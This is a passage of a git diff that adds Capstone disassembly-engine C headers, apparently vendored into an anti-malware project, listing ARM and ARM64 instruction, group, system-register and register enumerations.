ARM_INS_VCLS, + ARM_INS_VCLT, + ARM_INS_VCLZ, + ARM_INS_VCMP, + ARM_INS_VCMPE, + ARM_INS_VCNT, + ARM_INS_VCVTA, + ARM_INS_VCVTB, + ARM_INS_VCVT, + ARM_INS_VCVTM, + ARM_INS_VCVTN, + ARM_INS_VCVTP, + ARM_INS_VCVTT, + ARM_INS_VDIV, + ARM_INS_VDUP, + ARM_INS_VEOR, + ARM_INS_VEXT, + ARM_INS_VFMA, + ARM_INS_VFMS, + ARM_INS_VFNMA, + ARM_INS_VFNMS, + ARM_INS_VHADD, + ARM_INS_VHSUB, + ARM_INS_VLD1, + ARM_INS_VLD2, + ARM_INS_VLD3, + ARM_INS_VLD4, + ARM_INS_VLDMDB, + ARM_INS_VLDMIA, + ARM_INS_VLDR, + ARM_INS_VMAXNM, + ARM_INS_VMAX, + ARM_INS_VMINNM, + ARM_INS_VMIN, + ARM_INS_VMLA, + ARM_INS_VMLAL, + ARM_INS_VMLS, + ARM_INS_VMLSL, + ARM_INS_VMOVL, + ARM_INS_VMOVN, + ARM_INS_VMSR, + ARM_INS_VMUL, + ARM_INS_VMULL, + ARM_INS_VMVN, + ARM_INS_VNEG, + ARM_INS_VNMLA, + ARM_INS_VNMLS, + ARM_INS_VNMUL, + ARM_INS_VORN, + ARM_INS_VORR, + ARM_INS_VPADAL, + ARM_INS_VPADDL, + ARM_INS_VPADD, + ARM_INS_VPMAX, + ARM_INS_VPMIN, + ARM_INS_VQABS, + ARM_INS_VQADD, + ARM_INS_VQDMLAL, + ARM_INS_VQDMLSL, + ARM_INS_VQDMULH, + ARM_INS_VQDMULL, + ARM_INS_VQMOVUN, + ARM_INS_VQMOVN, + ARM_INS_VQNEG, + ARM_INS_VQRDMULH, + ARM_INS_VQRSHL, + ARM_INS_VQRSHRN, + ARM_INS_VQRSHRUN, + ARM_INS_VQSHL, + ARM_INS_VQSHLU, + ARM_INS_VQSHRN, + ARM_INS_VQSHRUN, + ARM_INS_VQSUB, + ARM_INS_VRADDHN, + ARM_INS_VRECPE, + ARM_INS_VRECPS, + ARM_INS_VREV16, + ARM_INS_VREV32, + ARM_INS_VREV64, + ARM_INS_VRHADD, + ARM_INS_VRINTA, + ARM_INS_VRINTM, + ARM_INS_VRINTN, + ARM_INS_VRINTP, + ARM_INS_VRINTR, + ARM_INS_VRINTX, + ARM_INS_VRINTZ, + ARM_INS_VRSHL, + ARM_INS_VRSHRN, + ARM_INS_VRSHR, + ARM_INS_VRSQRTE, + ARM_INS_VRSQRTS, + ARM_INS_VRSRA, + ARM_INS_VRSUBHN, + ARM_INS_VSELEQ, + ARM_INS_VSELGE, + ARM_INS_VSELGT, + ARM_INS_VSELVS, + ARM_INS_VSHLL, + ARM_INS_VSHL, + ARM_INS_VSHRN, + ARM_INS_VSHR, + ARM_INS_VSLI, + ARM_INS_VSQRT, + ARM_INS_VSRA, + ARM_INS_VSRI, + ARM_INS_VST1, + ARM_INS_VST2, + ARM_INS_VST3, + ARM_INS_VST4, + ARM_INS_VSTMDB, + ARM_INS_VSTMIA, + ARM_INS_VSTR, + ARM_INS_VSUB, + ARM_INS_VSUBHN, + ARM_INS_VSUBL, + ARM_INS_VSUBW, + ARM_INS_VSWP, + ARM_INS_VTBL, + ARM_INS_VTBX, + ARM_INS_VCVTR, + ARM_INS_VTRN, + ARM_INS_VTST, + ARM_INS_VUZP, + ARM_INS_VZIP, + ARM_INS_ADDW, + ARM_INS_ASR, + ARM_INS_DCPS1, + ARM_INS_DCPS2, + ARM_INS_DCPS3, + ARM_INS_IT, + ARM_INS_LSL, + ARM_INS_LSR, + ARM_INS_ORN, + ARM_INS_ROR, + ARM_INS_RRX, + ARM_INS_SUBW, + ARM_INS_TBB, + ARM_INS_TBH, + ARM_INS_CBNZ, + ARM_INS_CBZ, + ARM_INS_POP, + ARM_INS_PUSH, + + // special instructions + ARM_INS_NOP, + ARM_INS_YIELD, + ARM_INS_WFE, + ARM_INS_WFI, + ARM_INS_SEV, + ARM_INS_SEVL, + ARM_INS_VPUSH, + ARM_INS_VPOP, + + ARM_INS_ENDING, // <-- mark the end of the list of instructions +} arm_insn; + +/// Group of ARM instructions +typedef enum arm_insn_group { + ARM_GRP_INVALID = 0, ///< = CS_GRP_INVALID + + // Generic groups + // all jump instructions (conditional+direct+indirect jumps) + ARM_GRP_JUMP, ///< = CS_GRP_JUMP + ARM_GRP_CALL, ///< = CS_GRP_CALL + ARM_GRP_INT = 4, ///< = CS_GRP_INT + ARM_GRP_PRIVILEGE = 6, ///< = CS_GRP_PRIVILEGE + ARM_GRP_BRANCH_RELATIVE, ///< = CS_GRP_BRANCH_RELATIVE + + // Architecture-specific groups + ARM_GRP_CRYPTO = 128, + ARM_GRP_DATABARRIER, + ARM_GRP_DIVIDE, + ARM_GRP_FPARMV8, + ARM_GRP_MULTPRO, + ARM_GRP_NEON, + ARM_GRP_T2EXTRACTPACK, + ARM_GRP_THUMB2DSP, + ARM_GRP_TRUSTZONE, + ARM_GRP_V4T, + ARM_GRP_V5T, + ARM_GRP_V5TE, + ARM_GRP_V6, + ARM_GRP_V6T2, + ARM_GRP_V7, + ARM_GRP_V8, + ARM_GRP_VFP2, + ARM_GRP_VFP3, + ARM_GRP_VFP4, + ARM_GRP_ARM, + ARM_GRP_MCLASS, + ARM_GRP_NOTMCLASS, + ARM_GRP_THUMB, + ARM_GRP_THUMB1ONLY, + ARM_GRP_THUMB2, + ARM_GRP_PREV8, + ARM_GRP_FPVMLX, + ARM_GRP_MULOPS, + ARM_GRP_CRC, + ARM_GRP_DPVFP, + ARM_GRP_V6M, + ARM_GRP_VIRTUALIZATION, + + ARM_GRP_ENDING, +} arm_insn_group; + +#ifdef __cplusplus +} +#endif + +#endif diff --git a/ai_anti_malware/capstone/include/capstone/arm64.h b/ai_anti_malware/capstone/include/capstone/arm64.h new file mode 100644 index 0000000..0309f30 --- /dev/null +++ b/ai_anti_malware/capstone/include/capstone/arm64.h @@ -0,0 +1,1164 @@ +#ifndef CAPSTONE_ARM64_H +#define CAPSTONE_ARM64_H + +/* Capstone Disassembly Engine */ +/* By Nguyen Anh Quynh , 2013-2015 */ + +#ifdef __cplusplus +extern "C" { +#endif + +#include "platform.h" + +#ifdef _MSC_VER +#pragma warning(disable:4201) +#endif + +/// ARM64 shift type +typedef enum arm64_shifter { + ARM64_SFT_INVALID = 0, + ARM64_SFT_LSL = 1, + ARM64_SFT_MSL = 2, + ARM64_SFT_LSR = 3, + ARM64_SFT_ASR = 4, + ARM64_SFT_ROR = 5, +} arm64_shifter; + +/// ARM64 extender type +typedef enum arm64_extender { + ARM64_EXT_INVALID = 0, + ARM64_EXT_UXTB = 1, + ARM64_EXT_UXTH = 2, + ARM64_EXT_UXTW = 3, + ARM64_EXT_UXTX = 4, + ARM64_EXT_SXTB = 5, + ARM64_EXT_SXTH = 6, + ARM64_EXT_SXTW = 7, + ARM64_EXT_SXTX = 8, +} arm64_extender; + +/// ARM64 condition code +typedef enum arm64_cc { + ARM64_CC_INVALID = 0, + ARM64_CC_EQ = 1, ///< Equal + ARM64_CC_NE = 2, ///< Not equal: Not equal, or unordered + ARM64_CC_HS = 3, ///< Unsigned higher or same: >, ==, or unordered + ARM64_CC_LO = 4, ///< Unsigned lower or same: Less than + ARM64_CC_MI = 5, ///< Minus, negative: Less than + ARM64_CC_PL = 6, ///< Plus, positive or zero: >, ==, or unordered + ARM64_CC_VS = 7, ///< Overflow: Unordered + ARM64_CC_VC = 8, ///< No overflow: Ordered + ARM64_CC_HI = 9, ///< Unsigned higher: Greater than, or unordered + ARM64_CC_LS = 10, ///< Unsigned lower or same: Less than or equal + ARM64_CC_GE = 11, ///< Greater than or equal: Greater than or equal + ARM64_CC_LT = 12, ///< Less than: Less than, or unordered + ARM64_CC_GT = 13, ///< Signed greater than: Greater than + ARM64_CC_LE = 14, ///< Signed less than or equal: <, ==, or unordered + ARM64_CC_AL = 15, ///< Always (unconditional): Always (unconditional) + ARM64_CC_NV = 16, ///< Always (unconditional): Always (unconditional) + //< Note the NV exists purely to disassemble 0b1111. Execution + //< is "always". +} arm64_cc; + +/// System registers +typedef enum arm64_sysreg { + // System registers for MRS + ARM64_SYSREG_INVALID = 0, + ARM64_SYSREG_MDCCSR_EL0 = 0x9808, // 10 011 0000 0001 000 + ARM64_SYSREG_DBGDTRRX_EL0 = 0x9828, // 10 011 0000 0101 000 + ARM64_SYSREG_MDRAR_EL1 = 0x8080, // 10 000 0001 0000 000 + ARM64_SYSREG_OSLSR_EL1 = 0x808c, // 10 000 0001 0001 100 + ARM64_SYSREG_DBGAUTHSTATUS_EL1 = 0x83f6, // 10 000 0111 1110 110 + ARM64_SYSREG_PMCEID0_EL0 = 0xdce6, // 11 011 1001 1100 110 + ARM64_SYSREG_PMCEID1_EL0 = 0xdce7, // 11 011 1001 1100 111 + ARM64_SYSREG_MIDR_EL1 = 0xc000, // 11 000 0000 0000 000 + ARM64_SYSREG_CCSIDR_EL1 = 0xc800, // 11 001 0000 0000 000 + ARM64_SYSREG_CLIDR_EL1 = 0xc801, // 11 001 0000 0000 001 + ARM64_SYSREG_CTR_EL0 = 0xd801, // 11 011 0000 0000 001 + ARM64_SYSREG_MPIDR_EL1 = 0xc005, // 11 000 0000 0000 101 + ARM64_SYSREG_REVIDR_EL1 = 0xc006, // 11 000 0000 0000 110 + ARM64_SYSREG_AIDR_EL1 = 0xc807, // 11 001 0000 0000 111 + ARM64_SYSREG_DCZID_EL0 = 0xd807, // 11 011 0000 0000 111 + ARM64_SYSREG_ID_PFR0_EL1 = 0xc008, // 11 000 0000 0001 000 + ARM64_SYSREG_ID_PFR1_EL1 = 0xc009, // 11 000 0000 0001 001 + ARM64_SYSREG_ID_DFR0_EL1 = 0xc00a, // 11 000 0000 0001 010 + ARM64_SYSREG_ID_AFR0_EL1 = 0xc00b, // 11 000 0000 0001 011 + ARM64_SYSREG_ID_MMFR0_EL1 = 0xc00c, // 11 000 0000 0001 100 + ARM64_SYSREG_ID_MMFR1_EL1 = 0xc00d, // 11 000 0000 0001 101 + ARM64_SYSREG_ID_MMFR2_EL1 = 0xc00e, // 11 000 0000 0001 110 + ARM64_SYSREG_ID_MMFR3_EL1 = 0xc00f, // 11 000 0000 0001 111 + ARM64_SYSREG_ID_ISAR0_EL1 = 0xc010, // 11 000 0000 0010 000 + ARM64_SYSREG_ID_ISAR1_EL1 = 0xc011, // 11 000 0000 0010 001 + ARM64_SYSREG_ID_ISAR2_EL1 = 0xc012, // 11 000 0000 0010 010 + ARM64_SYSREG_ID_ISAR3_EL1 = 0xc013, // 11 000 0000 0010 011 + ARM64_SYSREG_ID_ISAR4_EL1 = 0xc014, // 11 000 0000 0010 100 + ARM64_SYSREG_ID_ISAR5_EL1 = 0xc015, // 11 000 0000 0010 101 + ARM64_SYSREG_ID_A64PFR0_EL1 = 0xc020, // 11 000 0000 0100 000 + ARM64_SYSREG_ID_A64PFR1_EL1 = 0xc021, // 11 000 0000 0100 001 + ARM64_SYSREG_ID_A64DFR0_EL1 = 0xc028, // 11 000 0000 0101 000 + ARM64_SYSREG_ID_A64DFR1_EL1 = 0xc029, // 11 000 0000 0101 001 + ARM64_SYSREG_ID_A64AFR0_EL1 = 0xc02c, // 11 000 0000 0101 100 + ARM64_SYSREG_ID_A64AFR1_EL1 = 0xc02d, // 11 000 0000 0101 101 + ARM64_SYSREG_ID_A64ISAR0_EL1 = 0xc030, // 11 000 0000 0110 000 + ARM64_SYSREG_ID_A64ISAR1_EL1 = 0xc031, // 11 000 0000 0110 001 + ARM64_SYSREG_ID_A64MMFR0_EL1 = 0xc038, // 11 000 0000 0111 000 + ARM64_SYSREG_ID_A64MMFR1_EL1 = 0xc039, // 11 000 0000 0111 001 + ARM64_SYSREG_MVFR0_EL1 = 0xc018, // 11 000 0000 0011 000 + ARM64_SYSREG_MVFR1_EL1 = 0xc019, // 11 000 0000 0011 001 + ARM64_SYSREG_MVFR2_EL1 = 0xc01a, // 11 000 0000 0011 010 + ARM64_SYSREG_RVBAR_EL1 = 0xc601, // 11 000 1100 0000 001 + ARM64_SYSREG_RVBAR_EL2 = 0xe601, // 11 100 1100 0000 001 + ARM64_SYSREG_RVBAR_EL3 = 0xf601, // 11 110 1100 0000 001 + ARM64_SYSREG_ISR_EL1 = 0xc608, // 11 000 1100 0001 000 + ARM64_SYSREG_CNTPCT_EL0 = 0xdf01, // 11 011 1110 0000 001 + ARM64_SYSREG_CNTVCT_EL0 = 0xdf02, // 11 011 1110 0000 010 + + // Trace registers + ARM64_SYSREG_TRCSTATR = 0x8818, // 10 001 0000 0011 000 + ARM64_SYSREG_TRCIDR8 = 0x8806, // 10 001 0000 0000 110 + ARM64_SYSREG_TRCIDR9 = 0x880e, // 10 001 0000 0001 110 + ARM64_SYSREG_TRCIDR10 = 0x8816, // 10 001 0000 0010 110 + ARM64_SYSREG_TRCIDR11 = 0x881e, // 10 001 0000 0011 110 + ARM64_SYSREG_TRCIDR12 = 0x8826, // 10 001 0000 0100 110 + ARM64_SYSREG_TRCIDR13 = 0x882e, // 10 001 0000 0101 110 + ARM64_SYSREG_TRCIDR0 = 0x8847, // 10 001 0000 1000 111 + ARM64_SYSREG_TRCIDR1 = 0x884f, // 10 001 0000 1001 111 + ARM64_SYSREG_TRCIDR2 = 0x8857, // 10 001 0000 1010 111 + ARM64_SYSREG_TRCIDR3 = 0x885f, // 10 001 0000 1011 111 + ARM64_SYSREG_TRCIDR4 = 0x8867, // 10 001 0000 1100 111 + ARM64_SYSREG_TRCIDR5 = 0x886f, // 10 001 0000 1101 111 + ARM64_SYSREG_TRCIDR6 = 0x8877, // 10 001 0000 1110 111 + ARM64_SYSREG_TRCIDR7 = 0x887f, // 10 001 0000 1111 111 + ARM64_SYSREG_TRCOSLSR = 0x888c, // 10 001 0001 0001 100 + ARM64_SYSREG_TRCPDSR = 0x88ac, // 10 001 0001 0101 100 + ARM64_SYSREG_TRCDEVAFF0 = 0x8bd6, // 10 001 0111 1010 110 + ARM64_SYSREG_TRCDEVAFF1 = 0x8bde, // 10 001 0111 1011 110 + ARM64_SYSREG_TRCLSR = 0x8bee, // 10 001 0111 1101 110 + ARM64_SYSREG_TRCAUTHSTATUS = 0x8bf6, // 10 001 0111 1110 110 + ARM64_SYSREG_TRCDEVARCH = 0x8bfe, // 10 001 0111 1111 110 + ARM64_SYSREG_TRCDEVID = 0x8b97, // 10 001 0111 0010 111 + ARM64_SYSREG_TRCDEVTYPE = 0x8b9f, // 10 001 0111 0011 111 + ARM64_SYSREG_TRCPIDR4 = 0x8ba7, // 10 001 0111 0100 111 + ARM64_SYSREG_TRCPIDR5 = 0x8baf, // 10 001 0111 0101 111 + ARM64_SYSREG_TRCPIDR6 = 0x8bb7, // 10 001 0111 0110 111 + ARM64_SYSREG_TRCPIDR7 = 0x8bbf, // 10 001 0111 0111 111 + ARM64_SYSREG_TRCPIDR0 = 0x8bc7, // 10 001 0111 1000 111 + ARM64_SYSREG_TRCPIDR1 = 0x8bcf, // 10 001 0111 1001 111 + ARM64_SYSREG_TRCPIDR2 = 0x8bd7, // 10 001 0111 1010 111 + ARM64_SYSREG_TRCPIDR3 = 0x8bdf, // 10 001 0111 1011 111 + ARM64_SYSREG_TRCCIDR0 = 0x8be7, // 10 001 0111 1100 111 + ARM64_SYSREG_TRCCIDR1 = 0x8bef, // 10 001 0111 1101 111 + ARM64_SYSREG_TRCCIDR2 = 0x8bf7, // 10 001 0111 1110 111 + ARM64_SYSREG_TRCCIDR3 = 0x8bff, // 10 001 0111 1111 111 + + // GICv3 registers + ARM64_SYSREG_ICC_IAR1_EL1 = 0xc660, // 11 000 1100 1100 000 + ARM64_SYSREG_ICC_IAR0_EL1 = 0xc640, // 11 000 1100 1000 000 + ARM64_SYSREG_ICC_HPPIR1_EL1 = 0xc662, // 11 000 1100 1100 010 + ARM64_SYSREG_ICC_HPPIR0_EL1 = 0xc642, // 11 000 1100 1000 010 + ARM64_SYSREG_ICC_RPR_EL1 = 0xc65b, // 11 000 1100 1011 011 + ARM64_SYSREG_ICH_VTR_EL2 = 0xe659, // 11 100 1100 1011 001 + ARM64_SYSREG_ICH_EISR_EL2 = 0xe65b, // 11 100 1100 1011 011 + ARM64_SYSREG_ICH_ELSR_EL2 = 0xe65d, // 11 100 1100 1011 101 +} arm64_sysreg; + +typedef enum arm64_msr_reg { + // System registers for MSR + ARM64_SYSREG_DBGDTRTX_EL0 = 0x9828, // 10 011 0000 0101 000 + ARM64_SYSREG_OSLAR_EL1 = 0x8084, // 10 000 0001 0000 100 + ARM64_SYSREG_PMSWINC_EL0 = 0xdce4, // 11 011 1001 1100 100 + + // Trace Registers + ARM64_SYSREG_TRCOSLAR = 0x8884, // 10 001 0001 0000 100 + ARM64_SYSREG_TRCLAR = 0x8be6, // 10 001 0111 1100 110 + + // GICv3 registers + ARM64_SYSREG_ICC_EOIR1_EL1 = 0xc661, // 11 000 1100 1100 001 + ARM64_SYSREG_ICC_EOIR0_EL1 = 0xc641, // 11 000 1100 1000 001 + ARM64_SYSREG_ICC_DIR_EL1 = 0xc659, // 11 000 1100 1011 001 + ARM64_SYSREG_ICC_SGI1R_EL1 = 0xc65d, // 11 000 1100 1011 101 + ARM64_SYSREG_ICC_ASGI1R_EL1 = 0xc65e, // 11 000 1100 1011 110 + ARM64_SYSREG_ICC_SGI0R_EL1 = 0xc65f, // 11 000 1100 1011 111 +} arm64_msr_reg; + +/// System PState Field (MSR instruction) +typedef enum arm64_pstate { + ARM64_PSTATE_INVALID = 0, + ARM64_PSTATE_SPSEL = 0x05, + ARM64_PSTATE_DAIFSET = 0x1e, + ARM64_PSTATE_DAIFCLR = 0x1f +} arm64_pstate; + +/// Vector arrangement specifier (for FloatingPoint/Advanced SIMD insn) +typedef enum arm64_vas { + ARM64_VAS_INVALID = 0, + ARM64_VAS_8B, + ARM64_VAS_16B, + ARM64_VAS_4H, + ARM64_VAS_8H, + ARM64_VAS_2S, + ARM64_VAS_4S, + ARM64_VAS_1D, + ARM64_VAS_2D, + ARM64_VAS_1Q, +} arm64_vas; + +/// Vector element size specifier +typedef enum arm64_vess { + ARM64_VESS_INVALID = 0, + ARM64_VESS_B, + ARM64_VESS_H, + ARM64_VESS_S, + ARM64_VESS_D, +} arm64_vess; + +/// Memory barrier operands +typedef enum arm64_barrier_op { + ARM64_BARRIER_INVALID = 0, + ARM64_BARRIER_OSHLD = 0x1, + ARM64_BARRIER_OSHST = 0x2, + ARM64_BARRIER_OSH = 0x3, + ARM64_BARRIER_NSHLD = 0x5, + ARM64_BARRIER_NSHST = 0x6, + ARM64_BARRIER_NSH = 0x7, + ARM64_BARRIER_ISHLD = 0x9, + ARM64_BARRIER_ISHST = 0xa, + ARM64_BARRIER_ISH = 0xb, + ARM64_BARRIER_LD = 0xd, + ARM64_BARRIER_ST = 0xe, + ARM64_BARRIER_SY = 0xf +} arm64_barrier_op; + +/// Operand type for instruction's operands +typedef enum arm64_op_type { + ARM64_OP_INVALID = 0, ///< = CS_OP_INVALID (Uninitialized). + ARM64_OP_REG, ///< = CS_OP_REG (Register operand). + ARM64_OP_IMM, ///< = CS_OP_IMM (Immediate operand). + ARM64_OP_MEM, ///< = CS_OP_MEM (Memory operand). + ARM64_OP_FP, ///< = CS_OP_FP (Floating-Point operand). + ARM64_OP_CIMM = 64, ///< C-Immediate + ARM64_OP_REG_MRS, ///< MRS register operand. + ARM64_OP_REG_MSR, ///< MSR register operand. + ARM64_OP_PSTATE, ///< PState operand. + ARM64_OP_SYS, ///< SYS operand for IC/DC/AT/TLBI instructions. + ARM64_OP_PREFETCH, ///< Prefetch operand (PRFM). + ARM64_OP_BARRIER, ///< Memory barrier operand (ISB/DMB/DSB instructions). +} arm64_op_type; + +/// TLBI operations +typedef enum arm64_tlbi_op { + ARM64_TLBI_INVALID = 0, + ARM64_TLBI_VMALLE1IS, + ARM64_TLBI_VAE1IS, + ARM64_TLBI_ASIDE1IS, + ARM64_TLBI_VAAE1IS, + ARM64_TLBI_VALE1IS, + ARM64_TLBI_VAALE1IS, + ARM64_TLBI_ALLE2IS, + ARM64_TLBI_VAE2IS, + ARM64_TLBI_ALLE1IS, + ARM64_TLBI_VALE2IS, + ARM64_TLBI_VMALLS12E1IS, + ARM64_TLBI_ALLE3IS, + ARM64_TLBI_VAE3IS, + ARM64_TLBI_VALE3IS, + ARM64_TLBI_IPAS2E1IS, + ARM64_TLBI_IPAS2LE1IS, + ARM64_TLBI_IPAS2E1, + ARM64_TLBI_IPAS2LE1, + ARM64_TLBI_VMALLE1, + ARM64_TLBI_VAE1, + ARM64_TLBI_ASIDE1, + ARM64_TLBI_VAAE1, + ARM64_TLBI_VALE1, + ARM64_TLBI_VAALE1, + ARM64_TLBI_ALLE2, + ARM64_TLBI_VAE2, + ARM64_TLBI_ALLE1, + ARM64_TLBI_VALE2, + ARM64_TLBI_VMALLS12E1, + ARM64_TLBI_ALLE3, + ARM64_TLBI_VAE3, + ARM64_TLBI_VALE3, +} arm64_tlbi_op; + +/// AT operations +typedef enum arm64_at_op { + ARM64_AT_S1E1R, + ARM64_AT_S1E1W, + ARM64_AT_S1E0R, + ARM64_AT_S1E0W, + ARM64_AT_S1E2R, + ARM64_AT_S1E2W, + ARM64_AT_S12E1R, + ARM64_AT_S12E1W, + ARM64_AT_S12E0R, + ARM64_AT_S12E0W, + ARM64_AT_S1E3R, + ARM64_AT_S1E3W, +} arm64_at_op; + +/// DC operations +typedef enum arm64_dc_op { + ARM64_DC_INVALID = 0, + ARM64_DC_ZVA, + ARM64_DC_IVAC, + ARM64_DC_ISW, + ARM64_DC_CVAC, + ARM64_DC_CSW, + ARM64_DC_CVAU, + ARM64_DC_CIVAC, + ARM64_DC_CISW, +} arm64_dc_op; + +/// IC operations +typedef enum arm64_ic_op { + ARM64_IC_INVALID = 0, + ARM64_IC_IALLUIS, + ARM64_IC_IALLU, + ARM64_IC_IVAU, +} arm64_ic_op; + +/// Prefetch operations (PRFM) +typedef enum arm64_prefetch_op { + ARM64_PRFM_INVALID = 0, + ARM64_PRFM_PLDL1KEEP = 0x00 + 1, + ARM64_PRFM_PLDL1STRM = 0x01 + 1, + ARM64_PRFM_PLDL2KEEP = 0x02 + 1, + ARM64_PRFM_PLDL2STRM = 0x03 + 1, + ARM64_PRFM_PLDL3KEEP = 0x04 + 1, + ARM64_PRFM_PLDL3STRM = 0x05 + 1, + ARM64_PRFM_PLIL1KEEP = 0x08 + 1, + ARM64_PRFM_PLIL1STRM = 0x09 + 1, + ARM64_PRFM_PLIL2KEEP = 0x0a + 1, + ARM64_PRFM_PLIL2STRM = 0x0b + 1, + ARM64_PRFM_PLIL3KEEP = 0x0c + 1, + ARM64_PRFM_PLIL3STRM = 0x0d + 1, + ARM64_PRFM_PSTL1KEEP = 0x10 + 1, + ARM64_PRFM_PSTL1STRM = 0x11 + 1, + ARM64_PRFM_PSTL2KEEP = 0x12 + 1, + ARM64_PRFM_PSTL2STRM = 0x13 + 1, + ARM64_PRFM_PSTL3KEEP = 0x14 + 1, + ARM64_PRFM_PSTL3STRM = 0x15 + 1, +} arm64_prefetch_op; + + +/// ARM64 registers +typedef enum arm64_reg { + ARM64_REG_INVALID = 0, + + ARM64_REG_X29, + ARM64_REG_X30, + ARM64_REG_NZCV, + ARM64_REG_SP, + ARM64_REG_WSP, + ARM64_REG_WZR, + ARM64_REG_XZR, + ARM64_REG_B0, + ARM64_REG_B1, + ARM64_REG_B2, + ARM64_REG_B3, + ARM64_REG_B4, + ARM64_REG_B5, + ARM64_REG_B6, + ARM64_REG_B7, + ARM64_REG_B8, + ARM64_REG_B9, + ARM64_REG_B10, + ARM64_REG_B11, + ARM64_REG_B12, + ARM64_REG_B13, + ARM64_REG_B14, + ARM64_REG_B15, + ARM64_REG_B16, + ARM64_REG_B17, + ARM64_REG_B18, + ARM64_REG_B19, + ARM64_REG_B20, + ARM64_REG_B21, + ARM64_REG_B22, + ARM64_REG_B23, + ARM64_REG_B24, + ARM64_REG_B25, + ARM64_REG_B26, + ARM64_REG_B27, + ARM64_REG_B28, + ARM64_REG_B29, + ARM64_REG_B30, + ARM64_REG_B31, + ARM64_REG_D0, + ARM64_REG_D1, + ARM64_REG_D2, + ARM64_REG_D3, + ARM64_REG_D4, + ARM64_REG_D5, + ARM64_REG_D6, + ARM64_REG_D7, + ARM64_REG_D8, + ARM64_REG_D9, + ARM64_REG_D10, + ARM64_REG_D11, + ARM64_REG_D12, + ARM64_REG_D13, + ARM64_REG_D14, + ARM64_REG_D15, + ARM64_REG_D16, + ARM64_REG_D17, + ARM64_REG_D18, + ARM64_REG_D19, + ARM64_REG_D20, + ARM64_REG_D21, + ARM64_REG_D22, + ARM64_REG_D23, + ARM64_REG_D24, + ARM64_REG_D25, + ARM64_REG_D26, + ARM64_REG_D27, + ARM64_REG_D28, + ARM64_REG_D29, + ARM64_REG_D30, + ARM64_REG_D31, + ARM64_REG_H0, + ARM64_REG_H1, + ARM64_REG_H2, + ARM64_REG_H3, + ARM64_REG_H4, + ARM64_REG_H5, + ARM64_REG_H6, + ARM64_REG_H7, + ARM64_REG_H8, + ARM64_REG_H9, + ARM64_REG_H10, + ARM64_REG_H11, + ARM64_REG_H12, + ARM64_REG_H13, + ARM64_REG_H14, + ARM64_REG_H15, + ARM64_REG_H16, + ARM64_REG_H17, + ARM64_REG_H18, + ARM64_REG_H19, + ARM64_REG_H20, + ARM64_REG_H21, + ARM64_REG_H22, + ARM64_REG_H23, + ARM64_REG_H24, + ARM64_REG_H25, + ARM64_REG_H26, + ARM64_REG_H27, + ARM64_REG_H28, + ARM64_REG_H29, + ARM64_REG_H30, + ARM64_REG_H31, + ARM64_REG_Q0, + ARM64_REG_Q1, + ARM64_REG_Q2, + ARM64_REG_Q3, + ARM64_REG_Q4, + ARM64_REG_Q5, + ARM64_REG_Q6, + ARM64_REG_Q7, + ARM64_REG_Q8, + ARM64_REG_Q9, + ARM64_REG_Q10, + ARM64_REG_Q11, + ARM64_REG_Q12, + ARM64_REG_Q13, + ARM64_REG_Q14, + ARM64_REG_Q15, + ARM64_REG_Q16, + ARM64_REG_Q17, + ARM64_REG_Q18, + ARM64_REG_Q19, + ARM64_REG_Q20, + ARM64_REG_Q21, + ARM64_REG_Q22, + ARM64_REG_Q23, + ARM64_REG_Q24, + ARM64_REG_Q25, + ARM64_REG_Q26, + ARM64_REG_Q27, + ARM64_REG_Q28, + ARM64_REG_Q29, + ARM64_REG_Q30, + ARM64_REG_Q31, + ARM64_REG_S0, + ARM64_REG_S1, + ARM64_REG_S2, + ARM64_REG_S3, + ARM64_REG_S4, + ARM64_REG_S5, + ARM64_REG_S6, + ARM64_REG_S7, + ARM64_REG_S8, + ARM64_REG_S9, + ARM64_REG_S10, + ARM64_REG_S11, + ARM64_REG_S12, + ARM64_REG_S13, + ARM64_REG_S14, + ARM64_REG_S15, + ARM64_REG_S16, + ARM64_REG_S17, + ARM64_REG_S18, + ARM64_REG_S19, + ARM64_REG_S20, + ARM64_REG_S21, + ARM64_REG_S22, + ARM64_REG_S23, + ARM64_REG_S24, + ARM64_REG_S25, + ARM64_REG_S26, + ARM64_REG_S27, + ARM64_REG_S28, + ARM64_REG_S29, + ARM64_REG_S30, + ARM64_REG_S31, + ARM64_REG_W0, + ARM64_REG_W1, + ARM64_REG_W2, + ARM64_REG_W3, + ARM64_REG_W4, + ARM64_REG_W5, + ARM64_REG_W6, + ARM64_REG_W7, + ARM64_REG_W8, + ARM64_REG_W9, + ARM64_REG_W10, + ARM64_REG_W11, + ARM64_REG_W12, + ARM64_REG_W13, + ARM64_REG_W14, + ARM64_REG_W15, + ARM64_REG_W16, + ARM64_REG_W17, + ARM64_REG_W18, + ARM64_REG_W19, + ARM64_REG_W20, + ARM64_REG_W21, + ARM64_REG_W22, + ARM64_REG_W23, + ARM64_REG_W24, + ARM64_REG_W25, + ARM64_REG_W26, + ARM64_REG_W27, + ARM64_REG_W28, + ARM64_REG_W29, + ARM64_REG_W30, + ARM64_REG_X0, + ARM64_REG_X1, + ARM64_REG_X2, + ARM64_REG_X3, + ARM64_REG_X4, + ARM64_REG_X5, + ARM64_REG_X6, + ARM64_REG_X7, + ARM64_REG_X8, + ARM64_REG_X9, + ARM64_REG_X10, + ARM64_REG_X11, + ARM64_REG_X12, + ARM64_REG_X13, + ARM64_REG_X14, + ARM64_REG_X15, + ARM64_REG_X16, + ARM64_REG_X17, + ARM64_REG_X18, + ARM64_REG_X19, + ARM64_REG_X20, + ARM64_REG_X21, + ARM64_REG_X22, + ARM64_REG_X23, + ARM64_REG_X24, + ARM64_REG_X25, + ARM64_REG_X26, + ARM64_REG_X27, + ARM64_REG_X28, + + ARM64_REG_V0, + ARM64_REG_V1, + ARM64_REG_V2, + ARM64_REG_V3, + ARM64_REG_V4, + ARM64_REG_V5, + ARM64_REG_V6, + ARM64_REG_V7, + ARM64_REG_V8, + ARM64_REG_V9, + ARM64_REG_V10, + ARM64_REG_V11, + ARM64_REG_V12, + ARM64_REG_V13, + ARM64_REG_V14, + ARM64_REG_V15, + ARM64_REG_V16, + ARM64_REG_V17, + ARM64_REG_V18, + ARM64_REG_V19, + ARM64_REG_V20, + ARM64_REG_V21, + ARM64_REG_V22, + ARM64_REG_V23, + ARM64_REG_V24, + ARM64_REG_V25, + ARM64_REG_V26, + ARM64_REG_V27, + ARM64_REG_V28, + ARM64_REG_V29, + ARM64_REG_V30, + ARM64_REG_V31, + + ARM64_REG_ENDING, // <-- mark the end of the list of registers + + // alias registers + + ARM64_REG_IP0 = ARM64_REG_X16, + ARM64_REG_IP1 = ARM64_REG_X17, + ARM64_REG_FP = ARM64_REG_X29, + ARM64_REG_LR = 